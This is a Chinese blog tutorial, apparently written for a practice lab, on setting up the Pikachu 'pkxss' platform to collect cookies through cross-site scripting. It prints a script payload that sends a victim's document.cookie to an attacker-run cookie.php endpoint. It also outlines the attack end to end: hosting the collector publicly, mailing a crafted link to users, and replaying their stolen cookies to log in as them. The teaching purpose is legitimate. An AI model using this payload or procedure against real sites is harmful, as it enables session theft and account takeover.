XSS跨站脚本攻击之——XSS平台搭建与——Cookie获取

最新推荐文章于 2024-05-06 10:39:23 发布
最新推荐文章于 2024-05-06 10:39:23 发布
阅读量1k 收藏 3
点赞数
分类专栏: web渗透测试与代码审计 #+ XSS跨站脚本攻击 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105336243
版权

XSS平台搭建及Cookie获取

准备工作

利用pikachuXSS后台
	pikachu\pkxss\inc目录下的config.inc.php
		修改mysql用户名密码
			登录后台

pikachu\pkxss\xcookie目录解读

	cookie.php
		获取cookie的API页面并存到攻击者平台数据库中
			获取完后才能重定向一个可信网站,起到迷惑用户隐藏攻击过程的作用
	pkxss_cookie_result.php
		对应攻击者后台页面

操作

payload

<script>document.location = 'http://192.168.0.101/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

				//通过document.location 实例进行重定向到http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=

具体思路

在公网上搭建一个平台
		在有输入参数的地方写入payload
			构造一个写入了payload的xss地址
				把这个URL地址发给用户 
					用户收到地址后点击地址,cookie就被窃取到攻击者搭建好的平台
						攻击者拿到用户的cookie之后
							通过抓包修改cookie就可以以用户的身份来访问网站了
温柔小薛
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解析如何防止XSS跨站脚本攻击
01-31
这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在客户端的不可信数据上来定位。不可信数据通常是来自HTTP请求的数据,以URL参数、表单字段、标头或者Cookie的形式。不过从安全角度来看,来自数据库、网络服务器和其他来源的数据往往也是不可信的,也就是说,这些数据可能没有完全通过验证。应该始终对不可信数据保持警惕,将其视为包含攻击,这意味着在发送不可信数据之前,应该采取措
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
简单的利用XSS获取用户cookie
shy的博客
10-25 4272
跨站脚本攻击XSS跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
04-xss获取cookie实验
最新发布
tianxiadiiw的博客
05-06 349
攻击者服务器:192.168.74.134,将获取cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。正常Web服务器:192.168.74.133,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。但是只有几分钟的时间进行操作,期间可以查看数据库,建立用户,用户向管理员举报有问题的页面,管理员前去访问,攻击者则直接获取到了管理员的cookie。攻击者在回帖中输入文章内容,并加入JavaScript开始进行xss攻击,3、获取管理员 Cookie
XSS漏洞利用之cookie获取
good good study
08-01 9871
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 7785
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 1575
有两个尝试点。
XSS平台的简单搭建获取cookie
m0_65096687的博客
10-09 2428
XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。选择蓝莲花XSS平台的原因很简单,因为网络上大多数XSS平台都是需要注册啊,绑定什么的。2.把下载好的蓝莲花解压在PHPstudy的WWW目录下,这里为我更名为XSS。只需要修改登录密码进行提交。
xss跨站脚本攻击与预防
11-04
XSS(Cross Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息或者操控用户的行为。这种攻击主要发生在Web应用中,攻击者通过注入恶意代码,使受害...
XSS跨站脚本攻击课件
11-24
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码到网页中,然后使用户在浏览器中执行这些恶意脚本,从而窃取用户的信息、会话令牌或者执行其他恶意操作。...
XSS跨站脚本攻击原理与实践1
08-03
本次实验旨在深入理解XSS跨站脚本攻击的原理,包括反射型、存储型和基于DOM的XSS,并掌握如何预防和检测这些攻击。通过对不同类型的XSS进行实践,学生应能了解其危害,学习如何避免在Web应用程序中引入此类漏洞。 ...
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3858
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss的利用,post型xss的利用  XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用:cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
手把手教你搭建XSS平台
热门推荐
seek_2022的博客
05-05 1万+
出于学习和技术分享的目的研究了一下XSS平台搭建的方法,由于网络上的教程虽然很多,但是对于很多细节的讲解不够深入,现将XSS平台搭建方法分享给大家。
web靶场——xss-labs靶机平台搭建和代码审计
weixin_51525416的博客
09-05 4561
web靶场-xss-labs靶机平台搭建和代码审计
保姆级 | XSS Platform环境搭建
尼泊罗河伯的博客
12-07 3117
XSS Platform 平台主要是用作验证跨站脚本攻击。该平台可以部署在本地或服务器环境中。我们可以使用 XSS Platfrom 平台搭建、学习或验证各种类型的 XSS 漏洞。
XSS-Demo: 一款深入了解和实践跨站脚本攻击安全学习平台
gitblog_00077的博客
03-27 465
XSS-Demo: 一款深入了解和实践跨站脚本攻击安全学习平台 项目地址:https://gitcode.com/haozi/xss-demo XSS-Demo 是一个开源项目,旨在为安全专业人员、开发者及网络安全爱好者提供一个实践和理解跨站脚本(Cross-Site Scripting, 简称XSS)攻击的平台。该项目通过各种示例展示了不同类型的XSS漏洞,帮助用户更好地预防和解决这类常见的W...
搭建自己的XSS利用平台-BLUE-LOTUS及简单使用
YeD666的博客
04-09 1612
搭建自己的XSS利用平台-BLUE-LOTUS及简单使用
XSS获取cookie
qq_40273198的博客
11-21 4555
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3129
未知攻,何来防。网络安全靶场学习:XSS跨站脚本攻击),使用XSS伪造目标权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值